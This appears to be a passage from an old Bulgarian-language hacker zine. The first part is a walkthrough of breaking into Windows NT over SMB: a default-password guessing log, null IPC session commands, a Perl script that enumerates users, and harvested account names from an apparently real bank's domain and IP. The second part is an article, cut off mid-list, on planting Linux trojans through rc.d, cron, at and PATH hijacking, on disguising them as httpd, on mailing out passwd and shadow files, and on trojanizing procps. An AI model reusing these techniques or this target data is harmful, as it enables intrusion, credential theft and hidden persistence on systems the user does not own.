[*]--- Attempting to connect with Username: `ADMIN' Password: `ADMIN'
[*]--- Attempting to connect with Username: `ADMIN' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `ADMIN' Password: `TEMP'
[*]--- Attempting to connect with Username: `ADMIN' Password: `SHARE'
[*]--- Attempting to connect with Username: `ADMIN' Password: `WRITE'
[*]--- Attempting to connect with Username: `ADMIN' Password: `FULL'
[*]--- Attempting to connect with Username: `ADMIN' Password: `BOTH'
[*]--- Attempting to connect with Username: `ADMIN' Password: `READ'
[*]--- Attempting to connect with Username: `ADMIN' Password: `FILES'
[*]--- Attempting to connect with Username: `ADMIN' Password: `DEMO'
[*]--- Attempting to connect with Username: `ADMIN' Password: `TEST'
[*]--- Attempting to connect with Username: `ADMIN' Password: `ACCESS'
[*]--- Attempting to connect with Username: `ADMIN' Password: `USER'
[*]--- Attempting to connect with Username: `ADMIN' Password: `BACKUP'
[*]--- Attempting to connect with Username: `ADMIN' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `ADMIN' Password: `SERVER'
[*]--- Attempting to connect with Username: `ADMIN' Password: `LOCAL'
[*]--- Attempting to connect with Username: `USER' Password: `'
[*]--- Attempting to connect with Username: `USER' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `USER' Password: `GUEST'
[*]--- Attempting to connect with Username: `USER' Password: `ROOT'
[*]--- Attempting to connect with Username: `USER' Password: `ADMIN'
[*]--- Attempting to connect with Username: `USER' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `USER' Password: `TEMP'
[*]--- Attempting to connect with Username: `USER' Password: `SHARE'
[*]--- Attempting to connect with Username: `USER' Password: `WRITE'
[*]--- Attempting to connect with Username: `USER' Password: `FULL'
[*]--- Attempting to connect with Username: `USER' Password: `BOTH'
[*]--- Attempting to connect with Username: `USER' Password: `READ'
[*]--- Attempting to connect with Username: `USER' Password: `FILES'
[*]--- Attempting to connect with Username: `USER' Password: `DEMO'
[*]--- Attempting to connect with Username: `USER' Password: `TEST'
[*]--- Attempting to connect with Username: `USER' Password: `ACCESS'
[*]--- Attempting to connect with Username: `USER' Password: `USER'
[*]--- Attempting to connect with Username: `USER' Password: `BACKUP'
[*]--- Attempting to connect with Username: `USER' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `USER' Password: `SERVER'
[*]--- Attempting to connect with Username: `USER' Password: `LOCAL'
[*]--- Attempting to connect with Username: `DEMO' Password: `'
[*]--- Attempting to connect with Username: `DEMO' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `DEMO' Password: `GUEST'
[*]--- Attempting to connect with Username: `DEMO' Password: `ROOT'
[*]--- Attempting to connect with Username: `DEMO' Password: `ADMIN'
[*]--- Attempting to connect with Username: `DEMO' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `DEMO' Password: `TEMP'
[*]--- Attempting to connect with Username: `DEMO' Password: `SHARE'
[*]--- Attempting to connect with Username: `DEMO' Password: `WRITE'
[*]--- Attempting to connect with Username: `DEMO' Password: `FULL'
[*]--- Attempting to connect with Username: `DEMO' Password: `BOTH'
[*]--- Attempting to connect with Username: `DEMO' Password: `READ'
[*]--- Attempting to connect with Username: `DEMO' Password: `FILES'
[*]--- Attempting to connect with Username: `DEMO' Password: `DEMO'
[*]--- Attempting to connect with Username: `DEMO' Password: `TEST'
[*]--- Attempting to connect with Username: `DEMO' Password: `ACCESS'
[*]--- Attempting to connect with Username: `DEMO' Password: `USER'
[*]--- Attempting to connect with Username: `DEMO' Password: `BACKUP'
[*]--- Attempting to connect with Username: `DEMO' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `DEMO' Password: `SERVER'
[*]--- Attempting to connect with Username: `DEMO' Password: `LOCAL'
[*]--- Attempting to connect with Username: `TEST' Password: `'
[*]--- Attempting to connect with Username: `TEST' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `TEST' Password: `GUEST'
[*]--- Attempting to connect with Username: `TEST' Password: `ROOT'
[*]--- Attempting to connect with Username: `TEST' Password: `ADMIN'
[*]--- Attempting to connect with Username: `TEST' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `TEST' Password: `TEMP'
[*]--- Attempting to connect with Username: `TEST' Password: `SHARE'
[*]--- Attempting to connect with Username: `TEST' Password: `WRITE'
[*]--- Attempting to connect with Username: `TEST' Password: `FULL'
[*]--- Attempting to connect with Username: `TEST' Password: `BOTH'
[*]--- Attempting to connect with Username: `TEST' Password: `READ'
[*]--- Attempting to connect with Username: `TEST' Password: `FILES'
[*]--- Attempting to connect with Username: `TEST' Password: `DEMO'
[*]--- Attempting to connect with Username: `TEST' Password: `TEST'
[*]--- CONNECTED: Username: `TEST' Password: `TEST'
[*]--- Obtained server information:
Server=[NSZGATE] User=[] Workgroup=[NSZ_DOMAIN] Domain=[]
[*]--- Obtained listing of shares:
Sharename Type Comment
--------- ---- -------
Add-ins Disk: "Access to EDK objects"
Address Disk: "Access to address objects"
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
connect$ Disk: "Access to gateway connectors"
D$ Disk: Default share
daxy Disk:
Exchange Disk:
F$ Disk: Default share
G$ Disk: Default share
IPC$ IPC: Remote IPC
mspclnt Disk:
Resources Disk: "Event logging files"
TEMP Disk:
tracking.log Disk: "Exchange message tracking logs"
wwwroot Disk:
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\Add-ins
[*]--- WARNING: Able to access share: \\*SMBSERVER\Add-ins
[*]--- Checking write access in: \\*SMBSERVER\Add-ins
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Add-ins
[*]--- Attempting to access share: \\*SMBSERVER\Address
[*]--- WARNING: Able to access share: \\*SMBSERVER\Address
[*]--- Checking write access in: \\*SMBSERVER\Address
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Address
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\connect$
[*]--- WARNING: Able to access share: \\*SMBSERVER\connect$
[*]--- Checking write access in: \\*SMBSERVER\connect$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\connect$
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\daxy
[*]--- WARNING: Able to access share: \\*SMBSERVER\daxy
[*]--- Checking write access in: \\*SMBSERVER\daxy
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\daxy
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\daxy
[*]--- Attempting to access share: \\*SMBSERVER\Exchange
[*]--- WARNING: Able to access share: \\*SMBSERVER\Exchange
[*]--- Checking write access in: \\*SMBSERVER\Exchange
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Exchange
[*]--- Attempting to access share: \\*SMBSERVER\F$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\G$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\mspclnt
[*]--- WARNING: Able to access share: \\*SMBSERVER\mspclnt
[*]--- Checking write access in: \\*SMBSERVER\mspclnt
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\mspclnt
[*]--- Attempting to access share: \\*SMBSERVER\Resources
[*]--- WARNING: Able to access share: \\*SMBSERVER\Resources
[*]--- Checking write access in: \\*SMBSERVER\Resources
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Resources
[*]--- Attempting to access share: \\*SMBSERVER\TEMP
[*]--- WARNING: Able to access share: \\*SMBSERVER\TEMP
[*]--- Checking write access in: \\*SMBSERVER\TEMP
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\TEMP
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\TEMP
[*]--- Attempting to access share: \\*SMBSERVER\tracking.log
[*]--- WARNING: Able to access share: \\*SMBSERVER\tracking.log
[*]--- Checking write access in: \\*SMBSERVER\tracking.log
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\tracking.log
[*]--- Attempting to access share: \\*SMBSERVER\wwwroot
[*]--- WARNING: Able to access share: \\*SMBSERVER\wwwroot
[*]--- Checking write access in: \\*SMBSERVER\wwwroot
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\wwwroot
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\wwwroot
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
Ako servera nqma resource sharing, rezultatut e sledniq:
[*]--- Checking host: xxx.xxx.xxx.xxx
[*]--- Obtaining list of remote NetBIOS names
[*]--- Was not able to obtain any information from remote server
W gorniq log se wivdat sharowe s $ nakraq. Towa sa specialni sharowe, koito
mogat da budat accesswani samo s administratorska parola. Interesnoto e che
sharowete C$, D$, E$ i t.n. se suzdawat pri wseki boot na machinata i nqma
nachin da se premahnat. Towa oznachawa, che ako hackera ima
administratorska parola i port 139 ne e firewallnat, nqma nachin toi da bude
sprqn - toi shte ima dostup do cqlata failwa sistem.
6.2) Null IPC sesion
IPC$ share sushtestwuwa pri wseki Windows NT i priema connectii bez ime i
parola. Po tozi nachin se osushtestwqwa t.n. "null IPC session".
c:\work>net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""
Tazi sesiq ima interesen efekt. W zawisimost ot configuraciqta na servera,
null IPC sesiqta move da pozwoli dostup do sistemata, koito inache ne e
pozwolen:
c:\work>net view \\xxx.xxx.xxx.xxx
System error 5 has occurred.
Access is denied.
c:\work>net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""
The command completed successfully.
c:\work>net view \\xxx.xxx.xxx.xxx
Shared resources at \\xxx.xxx.xxx.xxx
...
Sushto taka null IPC sesiqta pozwolqwa izdurpwane na userlist ot servera.
Towa stawa s programite SID2USER i USER2SID. Windows NT priswoqwa unikalen
identifikator na wseki user i wsqka grupa, narechen SID (Security ID). Prez
null IPC sesiqta mogat da se izwikwat funkcii za namirane na SID-a na user i
na username, swurzan s opredelen SID.
Neka purwo da poluchim SID-a na grupata "domain users"
c:\work>user2sid \\62.200.195.13 "domain users"
S-1-5-21-1748446749-1388774989-1237804090-513
Number of subauthorities is 5
Domain is BNBANK.ORG
Length of SID in memory is 28 bytes
Type of SID is SidTypeGroup
SID-a e 5 21 1748446749 1388774989 1237804090 513
Wsichki SID-owe na servera se razlichawat edinstweno po poslednite cifri
(513 w sluchaq). Po default SID-a na administratora zawurshwa na 500.
c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 500
Name is Georgi
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Default NT Install SID-wete sa:
Administrator S-1-5-21-917267712-1342860078-1792151419-500 (=0x1F4)
Guest S-1-5-21-917267712-1342860078-1792151419-501 (=0x1F5)
Standartnite groupi sa:
Domain Admins S-1-5-21-917267712-1342860078-1792151419-512 (=0x200)
Domain Users S-1-5-21-917267712-1342860078-1792151419-513 (=0x201)
Domain Guests S-1-5-21-917267712-1342860078-1792151419-514 (=0x202)
Normalnite user accounti zapochwat ot 1000 nagore. Sus sid2user move da bude
izdurpan userlista:
c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 1000
c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 1001
c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 1002
c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 1003
c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 1004
...
Towa move da se awtomatizira sus sledniq script:
-- CUT: userlist.pl --------------------------------------------------------
# Created by Mnemonix 08/06/98
$target=$ARGV[0];
$password='""';
$user='""';
$break=0;
$n=0;
system ("cls");
print ("USERLIST\nCreated by Mnemonix\n11th of June 1998\n\n");
print ("Connecting to IPC\$ share on $target...\n");
$connect=system ("net use \\\\$target\\ipc\$ $password /user:$user");
if ($connect==0) {
print ("Connected...\n\n");
print ("Getting the SID of the Guest account on $target\n");
system ("user2sid.exe \\\\$target Guest > u2s.tmp");
open (FILE , "u2s.tmp");
seek(FILE,6,0);
while ($break < 5) {
$char = getc (FILE);
if ($char eq "-") {
$char=" ";
@auth[$n]=$char;
$break++;
}
else {
@auth[$n]=$char;
}
$n++;
}
close(FILE);
system ("del u2s.tmp");
print ("This is auth 1: ");
print @auth;
print ("\n\n");
open (HANDLE, ">temp.txt");
select (HANDLE);
print @auth;
close (HANDLE);
select (STDOUT);
open (AUTH, "temp.txt");
$line=<AUTH>;
print ("Retrieving userlist...the list of users will be stored\n");
print ("in a text file called $target.txt\n");
$count=1000;
while ($count < 1050) {
print ("$count\n");
system("sid2user \\\\$target $line $count >> $target.txt");
$count++;
}
close (AUTH);
system ("del temp.txt");
print ("\nCompleted");
}
else {
print ("No IPC\$ share available");
}
-- CUT: userlist.pl --------------------------------------------------------
Eto izdurpaniq userlist na BNB:
Name is BNB_LN1$
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is nasko
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is IUSR_BNB_LN1
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is SATURNUS$
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is Stefcho
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is Ivan
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is Everyone
Domain is BNBANK.ORG
Type of SID is SidTypeGroup
Name is Lucy
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is STEFCHO$
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is ITD Admins
Domain is BNBANK.ORG
Type of SID is SidTypeGroup
Name is ITD.BNB.BG$
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is Stefan
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is Tzvetan
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is BNB-LN1$
Domain is BNBANK.ORG
Type of SID is SidTypeUser
Name is WEBSRV$
Domain is BNBANK.ORG
Type of SID is SidTypeUser
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#04ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Trojan Horse Hiding w/Linux IronCode
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
Table Of Contents:
1. Vuvedenie
2. Troiancite kato samostoiatelna programa
2.1. Startirane
2.1.1. Izpulnenie chrez rc.d
2.1.2. Izpulnenie chrez cron
2.1.3. Izpulnenie chrez at
2.1.4. Izpolzvane na nekorektno zadaden PATH
2.2. Prikrivane
2.2.1. Imena na procesite
2.2.2. Pri izpulnenie chrez cron i at
2.2.3. Pri izpulnenie chrez rc.d
2.2.4. Pri nekorekten PATH
2.2.5. Troianizirane na procps
3. Troianci, vgradeni v drugi programi
4. Obshti polozhenia (i po-specialno kriene na trafika)
4.1. Kriene na IP trafik
4.2. Izprashtane na poshta
4.2.1. Chrez direkten connection
4.2.2. Chrez sendmail
4.2.3. Troianec v sendmail
1. Vuvedenie
------------
Troianskite kone vinagi sa bili edno mnogo dobro i izpitano sredstvo da
poluchim tova, koeto drugi ne biha ni dali dobrovolno. Tova, kakto pokazva i
imeto im, sa programi, prednaznacheni podmolno da izvurshvat niakakva
operacia bez znanieto na potrebitelia.
Kak se pishat troianski kone niama da vi obiasniavam, zashtoto ne tova e
temata na nastoiashtata statia. No shte se postaraia da nahvurliam niakolko
idei, za da imate niakakuv start, ako reshite da pravite podobno neshto.
Varianti na troianski kone, razbira se, ima mnogo, taka che niama da mi se
surdite, ako izpusna neshto :-)
Troianskite kone mogat da se razdeliat na dva tipa - takiva, koito sa
vgradeni v uzh bezobidna programa, i takiva, koito na praktika sa si
samostoiatelna programa, koiato se krie po sistemata i se startira
avtomatichno po niakakuv nachin ili neshto takova.
Purvite, kogato sa vgradeni v niakoia specifichna programa, mogat da se
vuzpolzvat ot tova. Nikoi, naprimer, niama da oburne vnimanie na tova, che
sendmail izprashta poshta, nali? ;-) Osven tova modifikacia na samata
programa poniakoga pozvoliava na troiancheto da se krie oshte po-dobre.
2. Troiancite kato samostoiatelna programa
------------------------------------------
Tezi kato che li sa po-lesni za suzdavane, a i si imat svoite predimstva.
Nai-podhodiashti sa za mesta, kudeto ste poluchili root i ne e problem da
instalirate troiansko konche sami (a dori i da ne e root, mozhe da mu
namerite prilozhenie vurhu specifichen user).
2.1. Startirane
---------------
Samostoiatelnite troianci-programi mogat da budat startirani po dva nachina.
Ediniat e ruchno startirane (ot sobstvenika na troianeca ili ot zhertvata),
a drugiat e avtomatichno startirane. Dvata vida mogat i da se kombinirat -
kogato troianskia kon se pusne za purvi put, da se dobavi za avtomatichno
startirane.
Troianskite kone osven tova mogat da budat rezidentni ili nerezidentni, t.e.
da si sediat v pametta i da praviat neshto periodichno, ili da go praviat
vednaga i da prekratiavat deistvieto si.
2.1.1. Izpulnenie chrez rc.d
----------------------------
Sistemnata inicializacia pri Linux (sled kato se startira iadroto i
programata init) zapochva s izpulnenieto na scriptovete ot direktoriata
/etc/rc.d (e, zavisi, niakude mozhe da bude i init.d... Vazhna e ideiata).
Tezi scriptove ne se pipat mnogo chesto, tui kato vednuzh nastroena
sistema riadko se nalaga da bude promeniana. A puk ako vse pak niakoi reshi
da prochete ili promenia tezi scriptove, mozhe i da ne zabelezhi niakakuv si
dopulnitelen red, vmuknat mezhdu ostanalite (oshte poveche, ako izglezhda
ubeditelno.
Taka che scriptovete ot rc.d sa podhodiashto miasto za zarezhdane na
troianski kone, koito sediat rezidentni (ili sa neobhodimi pri start na
sistemata). Az lichno preporuchvam kato nai-dobri rc.M i rc.inet2, a mozhe
bi i rc.modules.
2.1.2. Izpulnenie chrez cron
----------------------------
Cron e sistemata za periodichno startirane na procesi. Mnogo e podhodiashta
za troianski kone, koito ne e nuzhno da vurviat startirani prez cialoto
vreme, no triabva da praviat neshto periodichno (primerno da mail-vat passwd
i shadow failove, ili da skanirat /var/spool/mail direktoriite).
Cron pri Linux (obiknoveno Dillon's Cron) se sustoi ot dve chasti - cron
daemon (crond), koito stoi rezidenten i se grizhi za izpulnenieto na
procesite, kogato tova e nuzhno, i programata crontab, s koiato mogat da se
redaktirat cron tablicite.
Vseki potrebitel na sistemata razpolaga sus svoia sobstvena cron tablica, v
koito mozhe da slaga procesi za izpulnenie. Procesite shte budat
izpulniavani v zadadenite vremena, nezavisimo ot tova dali potrebiteliat v
momenta e log-nat v sistemata ili ne. Zvuchi super, nali :-)
Redut v cron tablicite e vuv format "MIN HOUR DAY MONTH DAYOFWEEK COMMAND".
Pozvoleno e i da se zadavat maski, da se izbroiava (s razdelitel zapetaia),
kakto i da se ukazva vednuzh na kolko puti. Primerno (sledva izvadka ot
man-page-a na crontab) eto kak mozhe da se startira komandata date
periodichno:
# MIN HOUR DAY MONTH DAYOFWEEK COMMAND
# at 6:10 a.m. every day
10 6 * * * date
# every two hours at the top of the hour
0 */2 * * * date
# every two hours from 11p.m to 7a.m., and at 8a.m
0 23-7/2,8 * * * date
# at 11:00 a.m. on the 4th and on evert mon, tue, wed
0 11 4 * mon-wed
# 4:00 a.m. on january 1st
0 4 1 jan * date
# once an hour, all output appended to log file
0 4 1 jan * date >>/var/log/messages 2>&1
Edno ot predimstvata na tozi metod e, che pri preglezhdane na spisukut s
procesite ne se vizhda nishto neredno - procesut prosto ne e tam. A da se
startira primerno po vednuzh na chas, ili vednuzh na den, v produlzhenie na
polovin sekunda - prosto nikoi niama da go vidi.
Nedostatukut e, che potrebiteliat mozhe chrez crontab -l da si list-ne cron
tablicitie, i togava shte vidi procesa, koito niama nachin da se skrie. No
puk mozhe da se izmisli podhodiashto ime na programata i podhodiasht
komentar, koito da sluzhi za zabluda na protivnika v redkite sluchai, kogato
naistina reshi da gleda kudeto ne mu e rabota.
Drug problem e, che ako mashinata e izkliuchena po vremeto, koeto ste zadali
za startirane na komandata, tia prosto niama da se startira. No puk ako go
pravite na computer, koito bi triabvalo da e up prez cialoto vreme (primerno
server na Internet dostavchik), niama zashto da se pritesniavate, dori da
ste zadali izpulnenie vednuzh sedmichno.
Osven tova tozi metod mozhe da se kombinira sus startirane chrez rc.d -
primerno troiancheto osven po vednuzh sedmichno, da pravi kakvoto ima da
pravi i pri sistemen start. Taka, dori i da ne e uspiala da se izpulni
navreme, programata vi shte se izpulni vuzmozhno nai-skoro sled vkliuchvane
na sistemata.
2.1.3. Izpulnenie chrez at
--------------------------
at e sistema, podobna na cron, no sluzhi za ednokratno izpulnenie na komanda
v zadaden po-kusen chas. Mnogo e podhodiashta za razrushitelni troianski
kone, zatrivachki na logove, etc.
Vsushtnost at izpolzva cron. Sustoi se ot dve chasti - atrun, koiato
startira zadadenite za po-kusno izpulnenie komandi, kogato im doide vremeto
(ili kogato to e otminalo), i komandite at, batch, atq i atrm.
Atrun se namira v cron tablicata na root. Startira se periodichno,
proveriava chii komandi sa s izminalo (ili nastupilo vreme), i gi startira.
Normalno bi triabvalo da e s maska "* * * * *" v cron, no primerno
standartnoto pri Slack 3.6 e startirane na vseki 5 minuti. Tova niama
goliamo znachenie.
Komandite at i batch sluzhat za zadavane na komandi za izpulnenie. Atq
pokazva spisuk na chakashtite i na izpulnenite zadachi, a atrm premahva
zadachi ot spisuka.
Nedostatukut na tozi metod e, che kogato atq se startira ot root user, ne se
izpisvat samo negovite zadachi, ami se vadi pulen spisuk na zadachite na
vsichki potrebiteli, vkliuchitelno i tezi, koito veche sa bili startirani.
Taka che imaite predvid, che ako izpolzvate at, mnogo lesno mozhe da bude
vidiano kakvo ste pravili.
E, ako tova ne vi pritesniava, davaite smelo ;-) (ne, che pooshtriavam
razrushitelnite troianci, no, v kraina smetka, i takiva ima i ne triabva da
se prenebregvat).
2.1.4. Izpolzvane na nekorektno zadaden PATH
--------------------------------------------
Sistemnata promenliva PATH ukazva spisuk ot direktorii, koito se pretursvat,
kogato dadena programa triabva da bude izpulnena. Redut na tova pretursvane
e zadaden ot posledovatelnostta na izrezhdane na direktoriite v PATH.
Promenlivata se ustanoviava pri logvaneto na potrebitelia i se naglasiava
vuv failovete .profile i .login (a obshtia za sistemata PATH - v
/etc/profile).
Ako daden potrebitel slozhi tekushtata direktoria kato purvi element v PATH,
togava programite ot tekushtata direktoria shte budat izpulniavani purvi.
Programi sus sushtoto ime v drugi direktorii shte budat ignorirani.
Eto kak mozhe da nakarate potrebitelia, bez da se useti, da pusne
troiancheto sam. E, triabva da razchitate da ne go vidi, razbira se :-)
Slagate naprimer vasha si komanda cat v direktoriata, v koiato userut chesto
raboti, i gledate seir.
Preimushtestvoto na tozi metod e, che ne e neobhodimo da znaete parolata na
potrebitelia, a samo da imate razreshenie za pisane v niakoia ot
direktoriite, kudeto toi chesto raboti. Taka, kogato programata se izpulni,
tia she ima privilegiite na potrebitelia, kogoto atakuvate.
Tozi vid troianski kone mozhe da se kombinira i s niakoi ot predishnite
tipove, naprimer kogato se startira, veche deistvaiki ot imeto na
potrebitelia, koito go e startiral, da se samopremesti niakude i da se
samodobavi v cron tablicite, etc.
2.2. Prikrivane
---------------
Samostoiatelnite programi e nevuzmozhno da se skriat ot spisuka s procesite.
E, mozhete da napravite na sysadmin-a uslugata da mu instalirate nova versia
na procps, bez toi da razbere :-) Makar che tova ne e lesno reshenie.
Za smetka na tova puk mogat da se izpolzvat nai-razlichni tehniki (shashmi),
za da se zabludiat potrebitelite, dori i da vidiat, che takuv proces ima.
2.2.1. Imena na procesite
-------------------------
Kogato programata taka i taka shte se vizhda v spisuka s procesite (chrez
ps, top, etc), pone e hubavo da ne se nabiva na ochi. Kakvo tochno ime shte
izberete zavisi ot obstoiatelstvata, no vse pak ima idei, koito si
zasluzhava da budat spomenati.
Web-serverut Apache, naprimer, obiknoveno puska po niakolko svoi procesa,
koito sled obsluzhvaneto na opredelen broi zaiavki se restartirat (za da se
izbegnat exploiti). Ako se nalozhi sistemata da se natovari poveche, se
puskat oshte procesi. Taka che na takava mashina nikoi ne bi oburnal
vnimanie na edno httpd poveche ili po-malko. Eto naprimer moiata si
mashinka:
PID TTY TIME CMD
89 ? 00:00:00 httpd
90 ? 00:00:00 httpd
91 ? 00:00:00 httpd
92 ? 00:00:00 httpd
93 ? 00:00:00 httpd
94 ? 00:00:00 httpd
Che i proces, startiran ot cron, izglezhda po sushtia nachin! ;-) V tozi
sluchai si krushtavate troianeca "httpd" i niamate poveche grizhi.
A mozhete da si krustite procesa i agetty, naprimer, no togava, ako se
zagleda chovek, shte pravi vpechatlenie, che ne e na opredeleno tty. E, vse
pak e po-dobre agetty, otkolkoto my_trojan_horse ;-)
2.2.2. Pri izpulnenie chrez cron i at
-------------------------------------
Kakto veche spomenah, tozi metod e dobur v tova otnoshenie, zashtoto
procesite na praktika sa v pametta samo po vreme na izpulnenieto si (koeto
mozhe da zaema suvsem malko vreme), kato po tozi nachin ostavat
nezabeliazani pri preglezhdane na spisuka na procesite.
Za smetka na tova puk se vizhdat pri list-vane na cron tablicite i na at
zadachite. Tova obache stava dostatuchno riadko, za da e gore-dolu sigurno.
A i mozhe da se izpolzvat zabluzhdavashti imena (naprimer niama da bude
oburnato mnogo vnimanie na startiraneto na niakakuv si atrun, makar i da ne
e ot /usr/lib).
Osven tova mozhe da se popromeniat komandite atq ili crontab, taka che da ne
pokazvat opredeleni raboti.
2.2.3. Pri izpulnenie chrez rc.d
--------------------------------
Pri dobavianeto na troianski kone v rc.d-scriptovete triabva da se razchita
na tova potrebiteliat da ne zabelezhi, che se startira dopulnitelna
programa. Za celta tia triabva da se dobavi v
1. Golemi scriptove, ili
2. Scriptove, koito se pipat mnogo riadko,
a nai-dobre e kombinacia ot dvete.
Prosto za da imate predstava kude tochno da slozhite programkata,
scriptovete sa obshto vzeto slednite:
rc.0, rc.6 - tova sa scriptove, izpulniavani pri sistemen shutdown. rc.0 se
izpulniava pri halt, a rc.6 - pri reboot. Chesto dvata sa edno i sushto
neshto, na moiata mashina naprimer rc.0 e prosto symbolic link kum rc.6. Ne
znam za kakvo mogat da vi potriabvat tezi, tui kato veche e malko kusno da
se izpulniavat programi tochno po vreme na shutdown-a :-)
rc.4 - tova e script, koito se izpulniava pri prehod v runlevel 4 - xdm.
Tozi e naistina mnogo riadko izpolzvan, zashtoto nikoi ne e tolkova lud da
se otkazhe ot tekstovite konzoli. Koito iska grafika, shte si ia pusne bez
da minava v runlevel 4. Taka che tozi ne e za preporuchvane, osven ako ne
znaete izrichno, che sistemata vurvi v runlevel 4.
rc.K - pri prehod v runlevel 1, koeto e single mode, se izpulniava tozi
script, koito sluzhi za ubivane na vsichki procesi. Ne vi preporuchvam da
slagate troiancheto si tuk - shte bude kill-nato. A i niama da imate nuzhda
ot nego v single mode taka ili inache.
rc.S - tozi se izpulniava, kogato sistemata se bootva. Vkliuchva swap-a, i
izvikva rc.modules, rc.pcmcia i rc.serial.
rc.M - script, koito se izpulniava pri prehod v multi-user (t.e. vednaga
sled normalen start na sistemata). Tozi spored men e nai-dobroto miasto za
troianci, zaedno sus scriptovete, koito toi vika, a te sa vsichki ostanali -
rc.cdrom, rc.inet1 i inet2, rc.atalk, rc.font, rc.ibcs2, rc.httpd, rc.samba,
rc.keymap, rc.local. Zabelezhete, che ot tezi ne vsichki se vikat.
Podhodiashti sa rc.inet1 i rc.inet2.
rc.cdrom - inicializacia na ne-ATAPI CD-ROMs. Ako niama CD-ROM ili CD-ROM-ut
e ATAPI, tozi ne e neobhodimo da se startira, taka che e mnogo veroiatno
naistina da ne se startira.
rc.inet1 - sluzhi za bootvane na osnovnata INET sistema. Suzdava loopback
vruzkata i setup-va lokalnata mrezha, ako ima takava.
rc.inet2 - tozi bootva cialata INET sistema. Mount-va remote failovite
sistemi, puska syslogd, portmap i inetd, kakto i vsichki ostanali neobhodimi
demoni za mrezhovata rabota. Perfektno miasto za troianski kone.
rc.atalk - zarezhda AppleTalk demonite. Riadko izpolzvan.
rc.font - setup-va shriftovete za tekstovia rezhim. Ne razchitaite na nego,
zashtoto ne vseki si buzika shriftovete.
rc.ibcs2 - zarezhda iBCS. Script ot 3 reda, troianecut shte bude zabeliazan
mnogo lesno, no za smetka na tova puk niama koi da burka vutre.
rc.httpd - script ot edin red, startirasht httpd servera (obiknoveno
Apache). Pak e prekaleno maluk, no puk mozhe i da se nameri koi da burnika,
taka che ne e za preporuchvane.
rc.samba - poredniat kratuk script za instalacia na samba server.
rc.keymap - pri men takova zhivotno nema ;-)
rc.local - inicializacia na lokalnata sistema. Sluzhi samo za startirane na
gpm v povecheto sluchai. Ne si struva.
rc.modules - tova e scriptut, koito instalira dopulnitelnite draiveri. Dobur
e, zashtoto ima kude da se skrie startiraneto vutre, no puk ako se promeniat
sistemnite nastroiki, vse shte se nameri koi da se zachete v nego.
2.2.4. Pri nekorekten PATH
--------------------------
Pri tozi metod mai edinstvenoto, ot koeto triabva da se pritesniavate e, che
potrebiteliat mozhe da vidi programata. No dori i togava mozhete da
razchitate na liubopitstvoto mu da ia pusne :-) Makar che vse pak ne e dobre
da ia vizhda.
Eto zashto e hubavo da se sprete na komandata ls. Neka programata vi e
stealth-komanda ls... T.e, osven, che e troianec, vurshi normalnata rabota
na ls, bez da pokazva sebe si.
2.2.5. Troianizirane na procps
------------------------------
Paketut procps sudurzha nabor ot pomoshtni programi za sistemna informacia.
Tova sa programite ps, free, sessreg, skill, snice, tload, top, uptime,
